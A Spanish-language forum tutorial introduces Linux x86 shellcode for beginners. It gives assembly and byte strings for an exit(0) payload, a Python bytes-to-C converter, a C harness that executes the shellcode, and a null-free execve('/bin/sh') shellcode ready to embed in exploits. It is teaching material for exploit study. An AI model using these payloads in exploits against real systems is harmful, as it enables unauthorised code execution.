En este post voy a introducir el concepto de
shellcode para los que recien empiezan o capas para los que ya lo vieron pero no llegaron a entender como funciona. Usare un sistema Linux 32 bits para realizar las demostraciones.
Que significa shellcode?Primero necesitamos saber el significado etimologico de shellcode.
Shell es como se le dice en ingles (ahora universal) a una terminal. Por lo tanto shellcode significa que es un codigo que nos crea una terminal para que la usemos.
Actualmente el termino shellcode no solo se refiere al codigo que nos permite crear una shell, sino que se extiende a codigos con mas funciones como pueden ser crear usuarios, matar/crear un determinado proceso, dar permisos a una carpeta, etc.
Y tecnicamente... una shellcode es una porcion de codigo compilada para un determinado procesador que se ejecuta dentro de otro proceso previamente preparado para que la ejecute (ej: stack overflow).
Como creamos una shellcode?Generalmente se hacen en lenguaje
ASM (
assembler) para poder tener un control total del proceso ya que en C se agregan partes de codigo que no podemos controlar, ni hablar de otros lenguajes que ni siquiera pueden compilarse a codigo nativo del procesador (.NET, VB, Java, etc).
Ya sabemos que no tenemos muchos lenguajes para elegir jeje, asm de x86 (el procesador que usan las pcs) tiene dos sintaxis, la de Intel y la de AT&T, yo prefiero la segunda pero ya que la de Intel es mas popular usaremos esa.
Tambien necesitamos saber que una shellcode tiene que ser lo mas corta y portable posible, es por eso que usaremos llamadas al sistema y no llamaremos a la libc u otras librerias. La forma de llamar al sistema/kernel en *nix es mediante la interrupcion 0x80.
Tanta teoria se esta volviendo aburrida asi que vamos a los hechos, aca tenemos una shellcode bien simple que solamente cierra el programa llamando a exit(0).
Code (asm):
BITS 32
exit:
xor ebx,ebx ;ponemos 0 como argumento de exit
xor eax,eax ;limpiamos eax y ebx
mov al,0x01 ;ponemos 1 en eax (es el codigo de la syscall exit)
int 0x80 ;finalmente llamamos a la interrupcion
Ahi hicimos nuesta primer "shellcode".
Como extraemos los bytes u opcodes?Lo que haremos ahora es compilarla y extraer los bytecodes que son los que nos interesan a nosotros, por eso abrimos nuestra terminal y tipeamos:
~$ nasm exit.asm
si queremos saber si se compilo bien podemos desensamblarlo (en 32 bits) con
~$ ndisasm-b 32 exit
y nos mostrara el desensamblado del codigo con sus respectivos opcodes:
00000000 31DB xor ebx,ebx
00000002 31C0 xor eax,eax
00000004 B001 mov al,0x1
00000006 CD80 int 0x80
Para sacar estos opcodes podemos copiarlos uno por uno al exploit o a donde lo queramos poner; o sino extraerlos con alguna clase de script, yo me hice uno que pasa el archivo a la cadena de C directamente:
Code (python):
#!/usr/bin/python
from binascii import *
import sys
files = {}
length = []
def write(string):
sys.stdout.write(string)
def process_file(file):
source = open(file,"rb")
write("char shellcode[]=\n\t\t")
i = 1
l = 0
write("\"")
for data in source.read():
write("\\x")
write(b2a_hex(data))
if (i % 15)==0:
write("\"\n\t\t\"")
i+=1
l+=1
files[file[0:-4]]= l
write("\";\n\n")
source.close()
print("HDL Shellcode Lab - Bin to C")
if(len(sys.argv)<2):
exit(0)
process_file(sys.argv[1])
Como argumento le pasamos el archivo compilado anteriormente con nasm y nos devolvera algo asi que es una cadena en C para poner en nuestros exploits:
Code (c):
char shellcode[]=
"\x31\xdb\x31\xc0\xb0\x01\xcd\x80";
Como probar las shellcodes?Para probarlas podemos usar un pequeno codigo en C que salte a la shellcode directamente, aca les dejo un codigo muy simple y funcional:
Code (c):
char shellcode[] = "\x31\xdb\x31\xc0\xb0\x01\xcd\x80"; //aca ponemos nuestra shellcode
int main (int argc, char *argv[])
{
int (*run)(); //puntero a una funcion
run = shellcode; //asignamos la direccion de la shellcode al puntero
run(); // y la ejecutamos
}
Ahora que tenemos este codigo podemos usar cualquier debugger y poner un break en main, despues de eso ir paso por paso o sino agregamos un "int 3" al principio de la shellcode y el debugger va a saltar ahi.
Una shellcode mas complejaAca vamos a hacer una que nos de una shell (algo un poco mas util que salir de un programa jeje), mas especificamente una bash.
Code (asm):
BITS 32
xor eax,eax
push eax
push dword 0x68732f6e ;ponemos a /bin/sh en la pila
push dword 0x69622f2f
mov ebx,esp ;y le damos la direccion de /bin/sh a ebx
xor edx,edx
push edx ;ponemos el resto de los argumentos en la pila
push ebx
mov ecx,esp
mov al,0x0b ;llamamos a la syscall 0x0b (execve)
int 0x80
Y los bytecodes de esta shellcode despues de compilarla con nasm (y extraerla con el otro script) son:
Code (c):
char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x31\xd2\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
Estos bytecodes ya estan para usarse y como veran no tiene ningun caracter nulo en su extension ;-) (sobre
bad chars )
Fue mas que nada para perderle miedo a los terminos raros y entender mejor como estan compuestos los exploits.
Espero que les haya gustado esta pequena introduccion a shellcodes y si tienen dudas pregunten.
Saludos,
Seba.
Autor
En línea
